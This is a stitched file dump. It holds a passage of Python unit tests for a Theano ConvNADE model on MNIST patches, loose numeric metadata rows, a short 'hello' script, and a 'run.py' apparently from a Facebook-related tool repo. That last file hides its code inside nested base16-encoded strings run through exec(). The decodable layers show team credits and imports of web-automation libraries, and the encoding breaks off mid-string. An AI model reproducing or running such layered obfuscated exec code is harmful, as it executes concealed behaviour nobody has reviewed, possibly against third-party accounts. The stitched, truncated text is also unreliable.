432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) nb_channels = 1 with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels, use_mask_as_input=use_mask_as_input) convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize() # By default, uniform initialization. with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size) trainer = Trainer(optimizer, batch_scheduler) trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch)) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) # Print NLL mean/stderror. nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset), batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset))) trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror)) trainer.build_theano_graph() with Timer("Training"): trainer.train() with Timer("Checking the probs for all possible inputs sum to 1"): rng = np.random.RandomState(ordering_seed) D = np.prod(image_shape) inputs = cartesian([[0, 1]]*int(D), dtype=np.float32) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) symb_input = T.vector("input") symb_input.tag.test_value = inputs[-len(inputs)//4] symb_ordering = T.ivector("ordering") symb_ordering.tag.test_value = ordering nll_of_x_given_o = theano.function([symb_input, symb_ordering], model.nll_of_x_given_o(symb_input, symb_ordering), name="nll_of_x_given_o") #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True) for i in range(nb_orderings): print ("Ordering:", ordering) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) nlls = [] for no, input in enumerate(inputs): print("{}/{}".format(no, len(inputs)), end='\r') nlls.append(nll_of_x_given_o(input, ordering)) print("{}/{} Done".format(len(inputs), len(inputs))) p_x = np.exp(np.logaddexp.reduce(-np.array(nlls))) print("Sum of p(x) for all x:", p_x) assert_almost_equal(p_x, 1., decimal=5) def test_convnade_with_max_pooling(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "sigmoid" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 3 nb_orderings = 1 print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(max_epoch)) with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) nb_channels = 1 with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels, use_mask_as_input=use_mask_as_input) convnet_blueprint = "64@3x3(valid) -> max@2x2 -> up@2x2 -> 1@3x3(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize() # By default, uniform initialization. with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size) trainer = Trainer(optimizer, batch_scheduler) trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch)) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) # Print NLL mean/stderror. nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset), batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset))) trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror)) trainer.build_theano_graph() with Timer("Training"): trainer.train() with Timer("Checking the probs for all possible inputs sum to 1"): rng = np.random.RandomState(ordering_seed) D = np.prod(image_shape) inputs = cartesian([[0, 1]]*int(D), dtype=np.float32) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) symb_input = T.vector("input") symb_input.tag.test_value = inputs[-len(inputs)//4] symb_ordering = T.ivector("ordering") symb_ordering.tag.test_value = ordering nll_of_x_given_o = theano.function([symb_input, symb_ordering], model.nll_of_x_given_o(symb_input, symb_ordering), name="nll_of_x_given_o") #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True) for i in range(nb_orderings): print ("Ordering:", ordering) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) nlls = [] for no, input in enumerate(inputs): print("{}/{}".format(no, len(inputs)), end='\r') nlls.append(nll_of_x_given_o(input, ordering)) print("{}/{} Done".format(len(inputs), len(inputs))) p_x = np.exp(np.logaddexp.reduce(-np.array(nlls))) print("Sum of p(x) for all x:", p_x) assert_almost_equal(p_x, 1., decimal=5) def test_convnade_with_mask_as_input_channel(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "sigmoid" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 3 nb_orderings = 1 print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(max_epoch)) with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) # We consider the mask as an input channel so we do the necessary modification to the datasets. nb_channels = 1 + (use_mask_as_input is True) batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size, use_mask_as_input=use_mask_as_input) with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels) convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize() # By default, uniform initialization. with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): trainer = Trainer(optimizer, batch_scheduler) trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch)) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) # Print NLL mean/stderror. nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset), batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset), use_mask_as_input=use_mask_as_input)) trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror)) trainer.build_theano_graph() with Timer("Training"): trainer.train() with Timer("Checking the probs for all possible inputs sum to 1"): rng = np.random.RandomState(ordering_seed) D = np.prod(image_shape) inputs = cartesian([[0, 1]]*int(D), dtype=np.float32) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) d = rng.randint(D, size=(D, 1)) masks_o_lt_d = np.arange(D) < d map(rng.shuffle, masks_o_lt_d) # Inplace shuffling each row. symb_input = T.vector("input") symb_input.tag.test_value = inputs[-len(inputs)//4] symb_ordering = T.ivector("ordering") symb_ordering.tag.test_value = ordering nll_of_x_given_o = theano.function([symb_input, symb_ordering], model.nll_of_x_given_o(symb_input, symb_ordering), name="nll_of_x_given_o") #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True) for i in range(nb_orderings): print ("Ordering:", ordering) ordering = np.arange(D, dtype=np.int32) rng.shuffle(ordering) nlls = [] for no, input in enumerate(inputs): print("{}/{}".format(no, len(inputs)), end='\r') nlls.append(nll_of_x_given_o(input, ordering)) print("{}/{} Done".format(len(inputs), len(inputs))) p_x = np.exp(np.logaddexp.reduce(-np.array(nlls))) print("Sum of p(x) for all x:", p_x) assert_almost_equal(p_x, 1., decimal=5) def test_check_init(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "hinge" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 5 nb_orderings = 1 with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) nb_channels = 1 # Nested function to build a trainer. def _build_trainer(nb_epochs): print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(nb_epochs)) with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels, use_mask_as_input=use_mask_as_input) convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize(initer.UniformInitializer(random_seed=1234)) with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size) trainer = Trainer(optimizer, batch_scheduler) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) # Print NLL mean/stderror. nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset), batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset), keep_mask=True)) trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror)) trainer.append_task(stopping_criteria.MaxEpochStopping(nb_epochs)) return trainer, nll trainer1, nll1 = _build_trainer(nb_epochs=5) with Timer("Compiling training graph"): trainer1.build_theano_graph() with Timer("Compiling training graph"): trainer2, nll2 = _build_trainer(nb_epochs=5) # Check the two models have been initializedd the same way. assert_equal(len(trainer1._optimizer.loss.model.parameters), len(trainer2._optimizer.loss.model.parameters)) for param1, param2 in zip(trainer1._optimizer.loss.model.parameters, trainer2._optimizer.loss.model.parameters): assert_array_equal(param1.get_value(), param2.get_value(), err_msg=param1.name) with Timer("Training"): trainer1.train() trainer2.train() # Check the two models are the same after training for 5 epochs. assert_equal(len(trainer1._optimizer.loss.model.parameters), len(trainer2._optimizer.loss.model.parameters)) for param1, param2 in zip(trainer1._optimizer.loss.model.parameters, trainer2._optimizer.loss.model.parameters): # I tested it, they are equal when using float64. assert_array_almost_equal(param1.get_value(), param2.get_value(), err_msg=param1.name) def test_save_load_convnade(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "hinge" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 5 nb_orderings = 1 with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) nb_channels = 1 # Nested function to build a trainer. def _build_trainer(nb_epochs): print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(nb_epochs)) with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels, use_mask_as_input=use_mask_as_input) convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize(initer.UniformInitializer(random_seed=1234)) with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size) trainer = Trainer(optimizer, batch_scheduler) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) # Print NLL mean/stderror. nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset), batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset), keep_mask=True)) trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror)) trainer.append_task(stopping_criteria.MaxEpochStopping(nb_epochs)) return trainer, nll, logger trainer1, nll1, logger1 = _build_trainer(nb_epochs=10) with Timer("Compiling training graph"): trainer1.build_theano_graph() with Timer("Training"): trainer1.train() trainer2a, nll2a, logger2a = _build_trainer(5) with Timer("Compiling training graph"): trainer2a.build_theano_graph() with Timer("Training"): trainer2a.train() # Save model halfway during training and resume it. with tempfile.TemporaryDirectory() as experiment_dir: with Timer("Saving"): # Save current state of the model (i.e. after 5 epochs). trainer2a.save(experiment_dir) with Timer("Loading"): # Load previous state from which training will resume. trainer2b, nll2b, logger2b = _build_trainer(10) trainer2b.load(experiment_dir) # Check we correctly reloaded the model. assert_equal(len(trainer2a._optimizer.loss.model.parameters), len(trainer2b._optimizer.loss.model.parameters)) for param1, param2 in zip(trainer2a._optimizer.loss.model.parameters, trainer2b._optimizer.loss.model.parameters): assert_array_equal(param1.get_value(), param2.get_value(), err_msg=param1.name) with Timer("Compiling training graph"): trainer2b.build_theano_graph() with Timer("Training"): trainer2b.train() # Check we correctly resumed training. assert_equal(len(trainer1._optimizer.loss.model.parameters), len(trainer2b._optimizer.loss.model.parameters)) for param1, param2 in zip(trainer1._optimizer.loss.model.parameters, trainer2b._optimizer.loss.model.parameters): # I tested it, they are exactly equal when using float64. assert_array_almost_equal(param1.get_value(), param2.get_value(), err_msg=param1.name) # I tested it, they are exactly equal when using float64. assert_array_almost_equal(nll1.mean.view(trainer1.status), nll2b.mean.view(trainer2b.status)) assert_array_almost_equal(nll1.stderror.view(trainer1.status), nll2b.stderror.view(trainer2b.status)) # I tested it, they are exactly equal when using float64. assert_array_almost_equal(logger1.get_variable_history(0), logger2a.get_variable_history(0)+logger2b.get_variable_history(0)) assert_array_almost_equal(logger1.get_variable_history(1), logger2a.get_variable_history(1)+logger2b.get_variable_history(1)) def test_new_fprop_matches_old_fprop(): nb_kernels = 8 kernel_shape = (2, 2) hidden_activation = "sigmoid" use_mask_as_input = True batch_size = 1024 ordering_seed = 1234 max_epoch = 10 nb_orderings = 1 print("Will train Convoluational Deep NADE for a total of {0} epochs.".format(max_epoch)) with Timer("Loading/processing binarized MNIST"): trainset, validset, testset = load_binarized_mnist() # Extract the center patch (4x4 pixels) of each image. indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435] trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep], trainset.inputs.get_value()[:, indices_to_keep], name="trainset") validset = Dataset(validset.inputs.get_value()[:, indices_to_keep], validset.inputs.get_value()[:, indices_to_keep], name="validset") testset = Dataset(testset.inputs.get_value()[:, indices_to_keep], testset.inputs.get_value()[:, indices_to_keep], name="testset") image_shape = (4, 4) nb_channels = 1 + (use_mask_as_input is True) with Timer("Building model"): builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels, use_mask_as_input=use_mask_as_input) convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)" fullnet_blueprint = "5 -> 16" print("Convnet:", convnet_blueprint) print("Fullnet:", fullnet_blueprint) builder.build_convnet_from_blueprint(convnet_blueprint) builder.build_fullnet_from_blueprint(fullnet_blueprint) model = builder.build() model.initialize() # By default, uniform initialization. with Timer("Building optimizer"): loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset) optimizer = SGD(loss=loss) optimizer.append_direction_modifier(ConstantLearningRate(0.001)) with Timer("Building trainer"): batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size, use_mask_as_input=use_mask_as_input) trainer = Trainer(optimizer, batch_scheduler) # Print time for one epoch trainer.append_task(tasks.PrintEpochDuration()) trainer.append_task(tasks.PrintTrainingDuration()) # Log training error loss_monitor = views.MonitorVariable(loss.loss) avg_loss = tasks.AveragePerEpoch(loss_monitor) accum = tasks.Accumulator(loss_monitor) logger = tasks.Logger(loss_monitor, avg_loss) trainer.append_task(logger, avg_loss, accum) # Print average training loss. trainer.append_task(tasks.Print("Avg. training loss: : {}", avg_loss)) trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch)) trainer.build_theano_graph() with Timer("Training"): trainer.train() mask_o_lt_d = batch_scheduler._shared_batch_mask fprop_output, fprop_pre_output = model.fprop(trainset.inputs, mask_o_lt_d, return_output_preactivation=True) model_output = model.get_output(T.concatenate([trainset.inputs * mask_o_lt_d, mask_o_lt_d], axis=1)) assert_array_equal(model_output.eval(), fprop_pre_output.eval()) print(np.sum(abs(model_output.eval() - fprop_pre_output.eval()))) if __name__ == '__main__': # test_simple_convnade() # test_convnade_with_mask_as_input_channel() # test_convnade_with_max_pooling() test_save_load_convnade() test_check_init() test_new_fprop_matches_old_fprop()
43.434532
159
0.668698
3,551
30,187
5.440158
0.096593
0.018221
0.028264
0.039134
0.878869
0.868361
0.85278
0.841081
0.834403
0.821824
0
0.028509
0.228443
30,187
694
160
43.497118
0.800696
0.090238
0
0.851613
0
0.002151
0.085505
0
0
0
0
0
0.036559
1
0.017204
false
0
0.047312
0
0.068817
0.122581
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
85f9efe21514dd64ed03790486f607a2845a96be
96
py
Python
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
print("hello") print("hello") print("hello") print("hello") print("It's me") print("I'm here")
12
17
0.635417
16
96
3.8125
0.5
0.655738
0.983607
0.983607
0.737705
0.737705
0.737705
0
0
0
0
0
0.09375
96
7
18
13.714286
0.701149
0
0
0.666667
0
0
0.368421
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
0
0
null
1
1
1
0
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
9
c822f3529cdfd4e0b7e4d9887422bf6a6b98c447
92
py
Python
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
21
2016-03-12T00:59:04.000Z
2022-03-01T21:32:51.000Z
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
1
2017-04-17T04:39:46.000Z
2017-04-17T04:39:46.000Z
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
4
2016-07-25T11:55:52.000Z
2019-06-19T20:55:53.000Z
from fractions import gcd def get_gcd_cost(costs, cap): return reduce(gcd, costs + [cap])
23
35
0.73913
15
92
4.4
0.733333
0.242424
0
0
0
0
0
0
0
0
0
0
0.152174
92
4
35
23
0.846154
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
8d0d9c0bcc9c0425dbb4ee5c1069450d1666fccb
77
py
Python
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
from sqr_eqs import hello_world def test_hello(): assert hello_world()
12.833333
31
0.753247
12
77
4.5
0.75
0.37037
0
0
0
0
0
0
0
0
0
0
0.181818
77
5
32
15.4
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
7
23b443d7f3cdbcc5cbe2d048b9c746cb0571df53
20,869
py
Python
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
null
null
null
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
1
2020-05-05T10:06:37.000Z
2020-05-05T10:06:37.000Z
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
null
null
null
#Compile By : King Mr_Z17 #My Team. : Vortex Team import base64 exec(base64.b16decode("23436F6D70696C6520427920417269656C2053616E6479205065726D616E610A234D79205465616D203A20426C61636B20436F6465722043727573680A696D706F7274206261736536340A65786563286261736536342E6231366465636F646528223233343336463644373036393643363532303432373932303431373236393635364332303533363136453634373932303530363537323644363136453631304132333444373932303534363536313644323033413230343236433631363336423230343336463634363537323230343337323735373336383041363936443730364637323734323036323631373336353336333430413635373836353633323836323631373336353336333432453632333133363634363536333646363436353238323233323333333233303332343433323431333234343332333033363333333634363336333433363339333634353336333733333431333233303337333533373334333633363332343433333338333233303332343433323431333234343330343133323333333233303336333333363436333633343336333933363435333633373333343433373335333733343336333633323434333333383330343133363339333634343337333033363436333733323337333433323330333733333336343633363333333634323336333533373334333234333337333333373334333733323337333533363333333733343332343333363436333733333332343333373333333733393337333333323433333733343336333933363434333633353332343333373339333633313336333733363434333633313336333933363433333034313330343133363334333633353336333633323330333733333336343333363436333733373337333033373332333633393336343533373334333233383337333333323339333334313330343133323330333233303332333033323330333633363336343633373332333233303336333333323330333633393336343533323330333733333332333033323432333233303332333733353433333634353332333733333431333034313332333033323330333233303332333033323330333233303332333033323330333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533373337333733323336333933373334333633353332333833363333333233393330343133323330333233303332333033323330333233303332333033323330333233303337333333373339333733333332343533373333333733343336333433363436333733353337333433323435333633363336343333373335333733333336333833323338333233393330343133323330333233303332333033323330333233303332333033323330333233303337333433363339333634343336333533323435333733333336343333363335333633353337333033323338333333303332343533333331333233303332343633323330333333313333333033333330333233393330343133303431333634333336343633363337333634363332333033333434333233303332333233323332333233323335343333373338333333313336333233353432333333333333333233363434333034313330343134353332333933363338333434353332333933363338333434353332333933363338343333323330333233303332333033323330333233303332333033323330333233303332333034353332333933363338333434353332333933363338333433323330343533323338333034313332333233303332333034353332333933363338333434353332333933363338333433323330343533323338333034313332333233303435333233393336333833343435333233393336333833343435333233393336333833343332333033323435343533323339333633383334343533323339333633383334343533323339333633383334333233303332333033303431343533323339333633383338343533323339333633383338343533323338333034313332333233303332333034353332333933363431343133323330333233303332333033323330333233303435333233393336333933303435333233393336333833383332333034353332333933363338333033323330343533323339333634313431343533323339333633393330343533323339333633383338333233303435333233393336333833303332333034353332333933363431343134353332333933363338333034353332333933363338333433323435343533323339333633383330343333323432333734353332333933363338333034353332333933363338333433323330343533323339333633383338343333323432333733303431343533323339333633383338343533323339333633383338343533323339333634313431333233303332333033323330343533323339333633383334343533323339333633383338343533323339333633383330343533323339333633383334333233303435333233393336333833343435333233393336333833383332333034353332333933363338333034353332333933363338333834353332333933363338333434353332333933363338333434353332333933363338333833323330343533323339333633383330343533323339333633383338343533323339333633383334343533323339333633393330343533323339333633383330343533323339333633383330343533323339333634313431343533323339333633383334343533323339333633393330343533323339333633383330343533323339333633383330343533323339333633383334333233303330343134353332333933363339333034353332333933363338333834353332333933363338343334353332333933363339333034353332333933363338343334353332333933363339333034353332333933363338333834353332333933363338343333323435343533323339333633393330343533323339333633383433343533323339333633393330343533323339333633383338343533323339333633383334343533323339333634313431343533323339333633393330343533323339333633383338343533323339333633393330343533323339333633383338343533323339333633383334343533323339333634313431343533323339333633393330343533323339333633383338343533323339333633393330343533323339333633383338343533323339333633383334343533323339333633383334343533323339333633383433343533323339333633393330343533323339333633383338343533323338333034313332343533323339333633383338343533323339333633383433333034313332343534353332333933363338333034353332333933363338333034353332333933363338333033323330333233303435333233393336333833303435333233393336333833383435333233393336333833343435333233393336333833303435333233393336343134313433333234323337343533323339333633383330343533323339333633383330343533323339333633383330343533323339333633383330333233303433333234323337343533323339333633383330343533323339333633383330343533323339333633383330343533323339333633383330333233303332333034353332333933363338333034353332333933363338333034353332333933363338333033323330333234353435333233393336333833303332333033323330343533323339333633383330333233303335343333373338333333313336333233353432333333333333333333363434333433333335333233343335333433313335333433343436333533323332333033353433333733383333333133363332333534323333333033333330333634343330343133323332333233323332333233303431333034313336333433363335333633363332333033363338333633353336333133363334333633353337333233323338333233393333343133303431333033393336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633333336343333363335333633313337333233323337333233393330343133303339333733333336343333363436333733373337333033373332333633393336343533373334333233383336343333363436333633373336343633323339333034313330333933373330333733323336333933363